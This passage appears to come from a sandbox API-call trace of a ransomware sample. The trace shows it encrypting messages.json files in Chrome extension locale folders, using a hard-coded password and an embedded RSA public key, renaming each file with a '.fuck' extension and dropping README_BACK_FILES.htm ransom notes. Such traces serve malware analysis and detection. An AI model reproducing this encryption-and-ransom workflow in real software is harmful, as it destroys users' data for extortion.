lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ko\\messages.json"), bFailIfExists=0) returned 1 [0252.130] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ko\\messages.json", dwFileAttributes=0x0) returned 1 [0252.131] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ko\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ko\\messages.json.gsg")) returned 1 [0252.132] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ko\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ko\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ko\\messages.json.fuck")) returned 1 [0252.133] CryptDestroyHash (hHash=0x29846a0) returned 1 [0252.133] CryptDestroyKey (hKey=0x2983fe0) returned 1 [0252.133] CryptReleaseContext (hProv=0x298a040, dwFlags=0x0) returned 1 [0252.133] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0252.133] FindClose (in: hFindFile=0x2985a20 | out: hFindFile=0x2985a20) returned 1 [0252.133] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ko\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ko\\readme_back_files.htm")) returned 0xffffffff [0252.134] AreFileApisANSI () returned 1 [0252.134] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3ee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 155 [0252.134] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ko\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ko\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0252.134] GetFileType (hFile=0x5d60) returned 0x1 [0252.134] WriteFile (in: hFile=0x5d60, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0252.136] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0252.136] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lt\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2985a20 [0252.137] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0252.137] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0252.137] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0252.137] GetLastError () returned 0x0 [0252.137] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lt\\messages.json")) returned 0x20 [0252.137] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lt\\messages.json", dwFileAttributes=0x80) returned 1 [0252.138] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lt\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0252.138] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lt\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lt\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0252.152] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lt\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0252.153] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x298a040) returned 1 [0252.155] CryptCreateHash (in: hProv=0x298a040, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0252.155] lstrlenA (lpString="KbTPpdThroOLqoAPDACZIGRTzMlQm") returned 29 [0252.155] CryptHashData (hHash=0x29846a0, pbData=0x28cb440, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0252.155] CryptDeriveKey (in: hProv=0x298a040, Algid=0x6610, hBaseData=0x29846a0, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2983fe0) returned 1 [0252.155] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----b", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0252.156] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0252.156] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x298aae0) returned 1 [0252.156] CryptImportPublicKeyInfo (in: hCryptProv=0x298aae0, dwCertEncodingType=0x1, pInfo=0x2994240*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2994270*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2994278*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2984060) returned 1 [0252.156] CryptEncrypt (in: hKey=0x2984060, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0252.156] CryptEncrypt (in: hKey=0x2984060, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x298ba48*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x298ba48*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0252.156] WriteFile (in: hFile=0x5d64, lpBuffer=0x298ba48*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x298ba48*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0252.158] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xb3, lpOverlapped=0x0) returned 1 [0252.159] CryptEncrypt (in: hKey=0x2983fe0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xb3, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xc0) returned 1 [0252.159] WriteFile (in: hFile=0x5d64, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xc0, lpOverlapped=0x0) returned 1 [0252.159] CloseHandle (hObject=0x5d5c) returned 1 [0252.159] CloseHandle (hObject=0x5d64) returned 1 [0252.160] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lt\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lt\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lt\\messages.json"), bFailIfExists=0) returned 1 [0252.163] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lt\\messages.json", dwFileAttributes=0x0) returned 1 [0252.164] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lt\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lt\\messages.json.gsg")) returned 1 [0252.165] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lt\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lt\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lt\\messages.json.fuck")) returned 1 [0252.166] CryptDestroyHash (hHash=0x29846a0) returned 1 [0252.166] CryptDestroyKey (hKey=0x2983fe0) returned 1 [0252.166] CryptReleaseContext (hProv=0x298a040, dwFlags=0x0) returned 1 [0252.166] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0252.166] FindClose (in: hFindFile=0x2985a20 | out: hFindFile=0x2985a20) returned 1 [0252.167] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lt\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lt\\readme_back_files.htm")) returned 0xffffffff [0252.167] AreFileApisANSI () returned 1 [0252.167] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3a48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 155 [0252.167] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lt\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lt\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0252.168] GetFileType (hFile=0x5d60) returned 0x1 [0252.168] WriteFile (in: hFile=0x5d60, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0252.169] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0252.169] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lv\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2985a20 [0252.169] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0252.169] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0252.169] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0252.169] GetLastError () returned 0x0 [0252.169] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lv\\messages.json")) returned 0x20 [0252.170] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lv\\messages.json", dwFileAttributes=0x80) returned 1 [0252.171] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lv\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0252.172] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lv\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lv\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0252.172] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lv\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0252.173] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x298a040) returned 1 [0252.175] CryptCreateHash (in: hProv=0x298a040, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0252.175] lstrlenA (lpString="KbTPpdThroOLqoAPDACZIGRTzMlQm") returned 29 [0252.175] CryptHashData (hHash=0x29846a0, pbData=0x28cb4b8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0252.175] CryptDeriveKey (in: hProv=0x298a040, Algid=0x6610, hBaseData=0x29846a0, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2983fe0) returned 1 [0252.176] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----b", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0252.176] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0252.176] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x298b690) returned 1 [0252.176] CryptImportPublicKeyInfo (in: hCryptProv=0x298b690, dwCertEncodingType=0x1, pInfo=0x2992f90*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2992fc0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2992fc8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x29849e0) returned 1 [0252.176] CryptEncrypt (in: hKey=0x29849e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0252.176] CryptEncrypt (in: hKey=0x29849e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x298bf98*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x298bf98*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0252.176] WriteFile (in: hFile=0x5d5c, lpBuffer=0x298bf98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x298bf98*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0252.178] ReadFile (in: hFile=0x5d64, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xb3, lpOverlapped=0x0) returned 1 [0252.179] CryptEncrypt (in: hKey=0x2983fe0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xb3, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xc0) returned 1 [0252.179] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xc0, lpOverlapped=0x0) returned 1 [0252.179] CloseHandle (hObject=0x5d64) returned 1 [0252.179] CloseHandle (hObject=0x5d5c) returned 1 [0252.179] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lv\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lv\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lv\\messages.json"), bFailIfExists=0) returned 1 [0252.185] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lv\\messages.json", dwFileAttributes=0x0) returned 1 [0252.185] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lv\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lv\\messages.json.gsg")) returned 1 [0252.186] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lv\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lv\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lv\\messages.json.fuck")) returned 1 [0252.187] CryptDestroyHash (hHash=0x29846a0) returned 1 [0252.188] CryptDestroyKey (hKey=0x2983fe0) returned 1 [0252.188] CryptReleaseContext (hProv=0x298a040, dwFlags=0x0) returned 1 [0252.188] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0252.188] FindClose (in: hFindFile=0x2985a20 | out: hFindFile=0x2985a20) returned 1 [0252.188] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lv\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lv\\readme_back_files.htm")) returned 0xffffffff [0252.188] AreFileApisANSI () returned 1 [0252.188] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4378, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 155 [0252.188] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lv\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lv\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 